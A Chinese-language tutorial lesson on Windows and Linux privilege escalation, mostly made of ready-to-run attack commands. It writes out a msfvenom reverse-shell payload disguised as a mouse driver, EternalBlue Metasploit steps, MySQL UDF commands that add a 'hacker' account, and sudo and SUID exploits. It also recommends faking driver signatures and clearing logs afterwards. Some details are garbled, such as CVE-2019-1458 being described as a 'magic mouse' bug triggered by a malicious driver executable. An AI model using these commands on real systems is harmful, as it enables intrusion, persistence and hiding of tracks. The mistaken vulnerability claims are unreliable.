Windows系统提权实战：从零到域管理员

第12章 第113课

Windows系统提权实战：从零到域管理员

大家好，今天我们来聊聊Windows提权那些事儿。很多同学在渗透测试中经常卡在"拿到了Webshell但权限不够"的尴尬境地，这篇教程就带你用实战方式突破权限瓶颈 (￣ω￣;)

---

1. Windows提权基础：理解权限体系

(1) Windows权限等级

1. **User**：普通用户（能运行记事本但改不了系统设置）
2. **Administrator**：本地管理员（能装软件但动不了域设置）
3. **SYSTEM**：系统最高权限（相当于Linux的root）
4. **Domain Admin**：域管理员（能控制整个域）

(2) 提权路径示意图

graph LR A[Webshell→User] --> B{漏洞提权?} B -->|成功| C[Administrator] C --> D{是否在域?} D -->|是| E[横向移动→Domain Admin] D -->|否| F[本地控制]

---

2. CVE漏洞提权实战

(1) CVE-2019-1458（魔术鼠标漏洞）

适用系统：Win7/Win2008 R2及以下
特点：需要物理接触或RDP权限

# 生成恶意鼠标驱动
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > mouse_driver.exe

# 受害者执行后会触发漏洞
# Metasploit接收会话
msf6 > use exploit/multi/handler
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > exploit

防御绕过技巧：
修改驱动签名时间戳（使用SigThief工具）

(2) MS17-010（永恒之蓝）

适用系统：未打补丁的Win7/Win2008

# Kali下使用MSF模块
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.50
msf6 > exploit

# 手动检测目标是否脆弱
nmap -p 445 --script smb-vuln-ms17-010 192.168.1.0/24

实战踩坑记录：

• 企业内网常见错误：防火墙阻断445端口
• 解决方案：改用RDP漏洞（CVE-2019-0708）

---

3. MySQL UDF提权：从数据库到系统

(1) 前提条件

1. 获取MySQL root密码（通过Web漏洞或弱口令）
2. MySQL有写权限（secure_file_priv为空）
3. 系统允许加载动态链接库

(2) 实战步骤

-- 1. 上传恶意DLL（需转换成十六进制）
SELECT 0x4D5A... INTO DUMPFILE 'C:\\Windows\\temp\\udf.dll';

-- 2. 创建函数
CREATE FUNCTION sys_exec RETURNS integer SONAME 'udf.dll';

-- 3. 执行系统命令
SELECT sys_exec('net user hacker P@ssw0rd /add');

自动化工具：
使用SQLmap的--os-shell自动完成上述流程

---

4. Linux提权速成

(1) Sudo漏洞（CVE-2019-14287）

# 检查sudo版本
sudo -V | grep "Sudo version"

# 利用命令（需在/etc/sudoers有特殊配置）
sudo -u#-1 /bin/bash

(2) SUID提权

# 查找危险SUID文件
find / -perm -4000 2>/dev/null

# 经典案例：find命令提权
touch exploit
find exploit -exec "whoami" \;

---

5. 防御与检测

(1) 企业防护建议

1. 及时安装系统补丁（WSUS/SCCM）
2. 限制MySQL文件写入权限
3. 定期审计sudo配置

(2) 入侵检测命令

# 检查异常账户
net user | findstr /i "admin hacker"

# 查看可疑服务
wmic service where "name like '%tmp%'" get name,pathname

---

6. 提权工具包（自取）

1. **Windows**：
- WinPEAS：https://github.com/carlospolop/PEASS-ng
- Juicy Potato：https://github.com/ohpe/juicy-potato

2. **Linux**：
- LinPEAS：同PEASS-ng项目
- Linux Exploit Suggester：https://github.com/mzet-/linux-exploit-suggester

最后提醒：

• 提权成功后记得清理日志
• 企业环境中慎用MS17-010（动静太大）
• 保持学习，新的CVE每天都在出现 (╯°□°）╯︵ ┻━┻

下次我们讲域持久化技巧，想听的同学点个赞呗~